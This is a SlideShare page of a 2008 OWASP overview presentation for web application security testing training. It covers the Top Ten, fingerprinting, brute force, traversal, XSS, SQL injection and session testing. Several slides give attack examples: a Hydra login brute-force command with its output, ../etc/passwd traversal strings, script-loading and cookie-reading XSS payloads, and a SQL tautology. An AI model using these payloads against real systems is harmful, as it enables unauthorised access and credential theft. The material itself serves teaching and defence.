OWASP
 OVERVIEW




            Alberto Pastor Nieto
             Informática Gesfor
                    March 2008
OWASP
The Open Web Application Security Project
OWASP Top Ten
OWASP Testing Guide (Tools demonstration)
OWASP
The Open Web Application Security Project
OWASP Top Ten
OWASP Testing Guide (Tools demonstration)
OWASP
Open community
Interested in improving application security
Not affiliated with any technology company
OWASP
The Open Web Application Security Project
OWASP Top Ten
OWASP Testing Guide (Tools demonstration)
OWASP
          TOP TEN (2007)

1. Cross Site Scripting (XSS)
2. Injection Flaws
3. Malicious File Execution
4. Insecure D...
OWASP
The Open Web Application Security Project
OWASP Top Ten
OWASP Testing Guide (Tools demonstration)
Information Gathering

Testing Web Application Fingerprint
Application Discovery
Spidering and Googling
SSL/TLS Testing
Te...
Information Gathering
           Testing Web Application Fingerprint




Different servers                          Differ...
Information Gathering
   Testing Web Application Fingerprint

  $ nc 202.41.76.251 80
  HEAD / HTTP/1.0

  HTTP/1.1 200 OK...
Information Gathering
                 Testing Web Application Fingerprint




Tools:

          NETCRAFT ( http://www.net...
Information Gathering
   Testing Web Application Fingerprint
Information Gathering
                  Application Discovery



Related issues:

       Different base URL
       Non-sta...
Information Gathering
                 Application Discovery



Different base URL:

       Directory exploration?
       ...
Information Gathering
                        Application Discovery


Non-standard ports:
  nmap –P0 –sT –sV –p1-65535 192...
Information Gathering
                        Application Discovery



Virtual hosts:
    $ host -t ns www.owasp.org
    w...
Information Gathering
            Spidering and Googling


  Spidering:
wget -r http://www.example.com

   Googling:
googl...
Information Gathering
               SSL/TLS Testing



Vulnerability Scanners:
  Expired certificates
  Weak Ciphers
  .....
Information Gathering
       Testing for File Extensions Handling



Identify underlying technologies
Tools:
  wget
  curl...
Information Gathering
   Application Configuration Management Testing



Typical files and y directorios conocidos
Be care...
Information Gathering
       Old, Backup and Unreferenced Files



Site map and technology clues
Content clues
Practices:
...
Information Gathering
        Old, Backup and Unreferenced Files


No use: mod_autoindex y mod_info (Hide
unnecessary info...
Nessus
            http://www.nessus.org




Port Scanner
Vulnerability Scanner
Business Logic Testing


Automated tools find it hard to understand context
People who know logic business
Strong data tes...
Authentication
               Obtain User Accounts




Dictionary attacks
Bruteforce attacks
Pattern searching attacks
Authentication
              Obtain User Accounts




Tools:
         John the Ripper
         Hydra
         Brutus
     ...
Authentication
                          Obtain User Accounts

raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt w...
Authentication
           Bypassing authentication schema




• Direct page request
• Parameter modification
• Session IDs...
Authentication
          Bypassing authentication schema




Tools:

         WebScarab
         WebGoat (Trainning)
Authentication
             Directory traversal/file include




Known as “dot-dot-slash”

2 evaluation steps:

         I...
Authentication
             Directory traversal/file include




Input vectors enumeration:

        HTTP GET y POST reque...
Authentication
                      Directory traversal/file include




 Testing Techniques:
   http://example.com/getUs...
Authentication
           Directory traversal/file include




Tools:

         WebScarab
         Paros
         Burp Sui...
Authentication
      Vulnerable remember password and pwd reset




"Security questions":
      Multiple questions
      S...
Authentication
          Vulnerable remember password and pwd reset




Careful with “Remember password”:

   <INPUT TYPE=...
Session Management
         Logout and Browser Cache Management Testing



End Web Session:
• The user logs out
• The user...
Session Management
       Logout and Browser Cache Management Testing



KEY:


  INVALIDATE SERVER-SIDE SESSION



      ...
Session Management
      Logout and Browser Cache Management Testing




Other practices:


      End session button well ...
Session Management
         Logout and Browser Cache Management Testing




Tools:
         WebScarab
         Add N Edit ...
Session Management
      Analysis of the Session Management Schema




Session Tokens Analysis:

       Randomless
       ...
Session Management
         Cookie and Session Token Manipulation




Steps:

         Cookie Collection
         Cookie R...
Session Management
         Cookie and Session Token Manipulation




Tools:

         WebScarab
         Cookie Digger
Session Management
                          Cross Site Request Forgery (CSRF)


Cross-Site Request Forgery (CSRF) describ...
Data Validation
                              XSS (Cross Site Scripting)



XSS: Code injection attacks into the various i...
Data Validation
            XSS (Cross Site Scripting)




Tools:

         OWASP CAL9000
Data Validation
                                       SQL Injection

Insertion or "injection" of an SQL query via the inp...
Data Validation
             SQL Injection




Tools:

         OWASP SQLIX
         SQL DUMPER
Data Validation
                 Other Injections

LDAP Injection (Lightweight Directory Access Protocol)
ORM Injection (H...
Data Validation
                                       Buffer overflow



Issues caused by buffer overflows:


           ...
Denial of Service

User accounts blocked (Use CAPTCHAs)
Buffer overflows
User specified object allocation
User input as a ...
Web Services

   XML Structural Testing
Overloading the XML parser
   XML Content-level Testing
XML/SQL/XPath... Injection...
AJAX Testing
Increased attack surface with many more inputs to secure
Exposed internal functions of the application
Client...
Useful Tools

OWASP Enterprise Security API
OWASP Encoding (User Inputs validation)
OWASP Stinger (HTTP request validation...
Any Question?


   OWASP
http://www.owasp.org

   Romulus Project
http://www.ict-romulus.org
Upcoming SlideShare
Loading in...5
×

Romulus OWASP

2,778

Published on

Romulus project OWASP presentation.

More info at:
http://www.ict-romulus.eu/

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
2,778
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
32
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Romulus OWASP

  1. 1. OWASP OVERVIEW Alberto Pastor Nieto Informática Gesfor March 2008
  2. 2. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  3. 3. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  4. 4. OWASP Open community Interested in improving application security Not affiliated with any technology company
  5. 5. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  6. 6. OWASP TOP TEN (2007) 1. Cross Site Scripting (XSS) 2. Injection Flaws 3. Malicious File Execution 4. Insecure Direct Object Reference 5. Cross Site Request Forgery (CSRF) 6. Information Leakage and Improper Error Handling 7. Broken Authentication and Session Management 8. Insecure Cryptographic Storage 9. Insecure Communications 10. Failure to Restrict URL Access
  7. 7. OWASP The Open Web Application Security Project OWASP Top Ten OWASP Testing Guide (Tools demonstration)
  8. 8. Information Gathering Testing Web Application Fingerprint Application Discovery Spidering and Googling SSL/TLS Testing Testing for File Extensions Handling Application Configuration Management Testing Old, Backup and Unreferenced Files
  9. 9. Information Gathering Testing Web Application Fingerprint Different servers Different responses Different versions
  10. 10. Information Gathering Testing Web Application Fingerprint $ nc 202.41.76.251 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: Mon, 16 Jun 2003 02:53:29 GMT Server: Apache/1.3.3 (Unix) (Red Hat/Linux) Last-Modified: Wed, 07 Oct 1998 11:18:14 GMT ETag: "1813-49b-361b4df6" Accept-Ranges: bytes Content-Length: 1179 Connection: close Content-Type: text/html
  11. 11. Information Gathering Testing Web Application Fingerprint Tools: NETCRAFT ( http://www.netcraft.com ) httprint ( http://www.net-square.com/httprint/ )
  12. 12. Information Gathering Testing Web Application Fingerprint
  13. 13. Information Gathering Application Discovery Related issues: Different base URL Non-standard ports Virtual hosts
  14. 14. Information Gathering Application Discovery Different base URL: Directory exploration? Google (site:www.example.com) Candidate URLs (Ex. Nessus)
  15. 15. Information Gathering Application Discovery Non-standard ports: nmap –P0 –sT –sV –p1-65535 192.168.1.100 Interesting ports on 192.168.1.100: (The 65527 ports scanned but not shown below are in state: closed) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99) 80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux)) 443/tcp open ssl OpenSSL 901/tcp open http Samba SWAT administration server
  16. 16. Information Gathering Application Discovery Virtual hosts: $ host -t ns www.owasp.org www.owasp.org is an alias for owasp.org. owasp.org name server ns1.secure.net. owasp.org name server ns2.secure.net. http://searchdns.netcraft.com/?host
  17. 17. Information Gathering Spidering and Googling Spidering: wget -r http://www.example.com Googling: googlegath.pl http://www.nothink.org/perl/googlegath/
  18. 18. Information Gathering SSL/TLS Testing Vulnerability Scanners: Expired certificates Weak Ciphers ... Other tools: OpenSSL, SSLDigger
  19. 19. Information Gathering Testing for File Extensions Handling Identify underlying technologies Tools: wget curl web mirroring tools vulnerability scanners
  20. 20. Information Gathering Application Configuration Management Testing Typical files and y directorios conocidos Be careful with HTML comments Personalize Error Pages Only load necessary modules Minimised privileges Access (correct and incorrect) log
  21. 21. Information Gathering Old, Backup and Unreferenced Files Site map and technology clues Content clues Practices: look into robots.txt, sitemaps files public information (cache: site:) search files: ~ .old .bak...
  22. 22. Information Gathering Old, Backup and Unreferenced Files No use: mod_autoindex y mod_info (Hide unnecessary information) Correctness permisions Use CHROOT Logs recommendations
  23. 23. Nessus http://www.nessus.org Port Scanner Vulnerability Scanner
  24. 24. Business Logic Testing Automated tools find it hard to understand context People who know logic business Strong data testing
  25. 25. Authentication Obtain User Accounts Dictionary attacks Bruteforce attacks Pattern searching attacks
  26. 26. Authentication Obtain User Accounts Tools: John the Ripper Hydra Brutus Rainbow Tables
  27. 27. Authentication Obtain User Accounts raven@blackbox /hydra $ ./hydra -L users.txt -P words.txt www.site.com https-post-form "/index.cgi:login&name=^USER^&password=^PASS^&login=Login:Not allowed" & Hydra v5.3 (c) 2006 by van Hauser / THC - use allowed only for legal purposes. Hydra (http://www.thc.org)starting at 2009-07-04 19:16:17 [DATA] 16 tasks, 1 servers, 1638 login tries (l:2/p:819), ~102 tries per task [DATA] attacking service http-post-form on port 443 [STATUS] attack finished for wiki.intranet (waiting for childs to finish) [443] host: 10.0.0.1 login: owasp password: password [STATUS] attack finished for www.site.com (waiting for childs to finish) Hydra (http://www.thc.org) finished at 2009-07-04 19:18:34
  28. 28. Authentication Bypassing authentication schema • Direct page request • Parameter modification • Session IDs Prediction • SQL Injection
  29. 29. Authentication Bypassing authentication schema Tools: WebScarab WebGoat (Trainning)
  30. 30. Authentication Directory traversal/file include Known as “dot-dot-slash” 2 evaluation steps: Input vectors enumeration Testing Techniques
  31. 31. Authentication Directory traversal/file include Input vectors enumeration: HTTP GET y POST requests File loading HTML forms ...
  32. 32. Authentication Directory traversal/file include Testing Techniques: http://example.com/getUserProfile.jsp?item=../../../../etc/passwd Cookie: USER=1826cc8f:PSTYLE=../../../../etc/passwd http://example.com/index.php?file=http://www.owasp.org/malicioustxt CAREFUL WITH CHARSET!! %2e%2e%2f is ../ %2e%2e/ is ../ %2e%2e%5c is .. ..%2f is ../ %2e%2e is .. ..%5c is ..
  33. 33. Authentication Directory traversal/file include Tools: WebScarab Paros Burp Suite
  34. 34. Authentication Vulnerable remember password and pwd reset "Security questions": Multiple questions Strong questions Number of attempts CAPTCHA Sending to email
  35. 35. Authentication Vulnerable remember password and pwd reset Careful with “Remember password”: <INPUT TYPE="password" AUTOCOMPLETE="off"> If password is into a Cookie: In a hashed form
  36. 36. Session Management Logout and Browser Cache Management Testing End Web Session: • The user logs out • The user remains idle for a certain amount of time and the application automatically logs him/her out
  37. 37. Session Management Logout and Browser Cache Management Testing KEY: INVALIDATE SERVER-SIDE SESSION Java: HttpSession.invalidate()
  38. 38. Session Management Logout and Browser Cache Management Testing Other practices: End session button well visible Invalidate Cookies in client-side
  39. 39. Session Management Logout and Browser Cache Management Testing Tools: WebScarab Add N Edit Cookies (Firefox ext) Web Developer (Firefox ext)
  40. 40. Session Management Analysis of the Session Management Schema Session Tokens Analysis: Randomless Uniqueness Resistance to statistical analysis Resistance to cryptographic analysis
  41. 41. Session Management Cookie and Session Token Manipulation Steps: Cookie Collection Cookie Reverse Engineering Cookie manipulation
  42. 42. Session Management Cookie and Session Token Manipulation Tools: WebScarab Cookie Digger
  43. 43. Session Management Cross Site Request Forgery (CSRF) Cross-Site Request Forgery (CSRF) describes a way to force an unknowing user to execute unwanted actions on a web application in which he is currently authenticated. Recommended practices: Add session-related information in URLs Use POST Intermediate pages (“Are you sure you really want to do this?”) Use REFERER headers
  44. 44. Data Validation XSS (Cross Site Scripting) XSS: Code injection attacks into the various interpreters in the browser. http://server/cgi-bin/testcgi.exe? <SCRIPT>alert(“Cookie”+document.cookie)</SCRIPT> <script src=http://www.example.com/malicious-code.js></script> %3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e x3cscript src=http://www.example.com/malicious-code.jsx3ex3c/scriptx3e Revise all input vectors
  45. 45. Data Validation XSS (Cross Site Scripting) Tools: OWASP CAL9000
  46. 46. Data Validation SQL Injection Insertion or "injection" of an SQL query via the input data from the client to the application. Example: SELECT * FROM Users WHERE Username='$username' AND Password='$password' Input: $username = 1' or '1' = '1 $password = 1' or '1' = '1 SELECT * FROM Users WHERE Username= '1' OR '1' = '1' AND Password= '1' OR '1' = '1'
  47. 47. Data Validation SQL Injection Tools: OWASP SQLIX SQL DUMPER
  48. 48. Data Validation Other Injections LDAP Injection (Lightweight Directory Access Protocol) ORM Injection (Hibernate in Java, Nhibernate in .NET, ActiveRecord in Ruby on Rails) XML Injection SSI Injection XPATH Injection IMAP/SMTP Injection System commands Injection
  49. 49. Data Validation Buffer overflow Issues caused by buffer overflows: Denial of service (DoS) Code Injection Code execution Practices: Update software Best practices
  50. 50. Denial of Service User accounts blocked (Use CAPTCHAs) Buffer overflows User specified object allocation User input as a loop counter User provide data to disk Failure to release resources Store too much data in Session
  51. 51. Web Services XML Structural Testing Overloading the XML parser XML Content-level Testing XML/SQL/XPath... Injections Validate Input Size Naugthy SOAP Attachments Testing Man-in-the-middle Testing
  52. 52. AJAX Testing Increased attack surface with many more inputs to secure Exposed internal functions of the application Client access to third-party resources with no built-in security and encoding mechanisms Failure to protect authentication information and sessions Blurred line between client-side and server-side code, resulting in security mistakes
  53. 53. Useful Tools OWASP Enterprise Security API OWASP Encoding (User Inputs validation) OWASP Stinger (HTTP request validation) OWASP CSRFTester Project
  54. 54. Any Question? OWASP http://www.owasp.org Romulus Project http://www.ict-romulus.org
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×